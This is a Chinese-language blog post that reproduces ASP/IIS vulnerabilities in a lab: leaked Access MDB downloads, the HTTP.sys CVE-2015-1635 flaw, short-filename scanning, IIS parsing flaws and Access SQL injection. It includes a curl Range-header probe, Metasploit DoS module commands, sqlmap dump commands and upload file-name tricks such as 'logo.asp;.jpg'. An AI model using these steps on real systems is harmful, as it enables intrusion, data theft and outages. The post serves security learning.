记一篇与asp语言相关的漏洞汇总

MDB数据库泄露下载

  1. 简介
    1. 首先,MDB数据库不是MongoDB数据库,MDB数据库是access数据库的一种文件格式,而由于大部分ASP程序与ACCESS数据库搭建,但ACCESS无需连接,都在脚本文件中定 义配置好数据库路径即用,不需要额外配置安装数据库,所以大部分提前固定好的数据库 路径如默认未修改,当攻击者知道数据库的完整路径,可远程下载后解密数据实现攻击
  2. 漏洞复现

虚拟机:2003企业版32位IIS6.0

可以看到服务端的数据库为#data.mdb

访问器路径http://192.168.88.141:81/database/%23data.md,有数据库下载

HTTP.SYS远程代码执行漏洞(CVE-2015-1635)

  1. 漏洞描述

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分 析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户 的上下文中执行任意代码。

  1. 影响版本

Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2

  1. 漏洞利用条件

安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、 Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本

  1. 漏洞复现

判断漏洞是否存在,在kaili输入

curl -v 192.168.88.141 -H “192.168.88.141:81” -H “Range: bytes=0-18446744073709551615”

有发现返回”range is not satisfiable”就说明有漏洞了。

在kaili中输入以下代码即可

msfconsole

use auxiliary/dos/http/ms15_034_ulonglongadd

set rhosts xx.xx.xx.xx(ip)

set rport xx

run

IIS短文件之目录扫描

1、概念

在DOS和早期的Windows系统中,文件名的长度被限制为8个字符加上一个点加上3个字符的扩展名,这种格式被称为8.3格式。在Windows下查看对应的短文件名,可以使用命令dir /x

例如

C:\Users\Administrator>dir /x
2024/07/11  14:49    <DIR>          DOCUME~1     Documents
2024/07/22  12:17    <DIR>          DOWNLO~1     Downloads
2024/06/16  03:50    <DIR>          FAVORI~1     Favorites
2024/07/18  13:15    <DIR>          IDEAPR~1     IdeaProjects

它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。

3、应用场景:

后台路径获取,数据库文件获取,其他敏感文件获取等

4、漏洞利用:

https://github.com/lijiejie/IIS_shortname_Scanner

输入命令:python iis_shortname_scan.py http://192.168.88.141:81/即可

IIS文件解析漏洞

  1. IIS 6 解析漏洞
    1. 该版本会将*.asp;.jpg的格式当成asp解析

      1. logo.asp;.jpg
    2. 该版本会将*.asp/目录下的所有文件当成asp解析

      1. xx.asp/logo.jpg
  2. IIS 7 解析漏洞
    1. 该版本会将/xx.jpg/xx.php解析成php文件

IIS写权限漏洞

  1. 简介
    1. 通过写入权限来上传木马
  2. 条件
    1. 目录权限开启写入
    2. 开启webdev
  3. 漏洞复现
    1. 参考文章:题目2-IIS写权限漏洞分析溯源-腾讯云开发者社区-腾讯云 (tencent.com)

access注入

  • 简介

    • access数据库无管理员账号密码,顶级架构为表名,列名(字段),数据,所以在注入猜解中一般采用字典猜解表和列再获取数据。猜解过程简单,但又可能出现猜解不全的情况。由于Access数据库在当前安全发展中已很少存在,故直接使用SQLMap进行注入测试
  • 使用命令:

    • python sqlmap.py -u “域名” --tables //获取表名
    • python sqlmap.py -u “域名” -cloumns -T admin//获取admin表名下的列名
    • python sqlmap.py -u “域名” -dump -C “” -T admin//获取表名下的列名数据
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值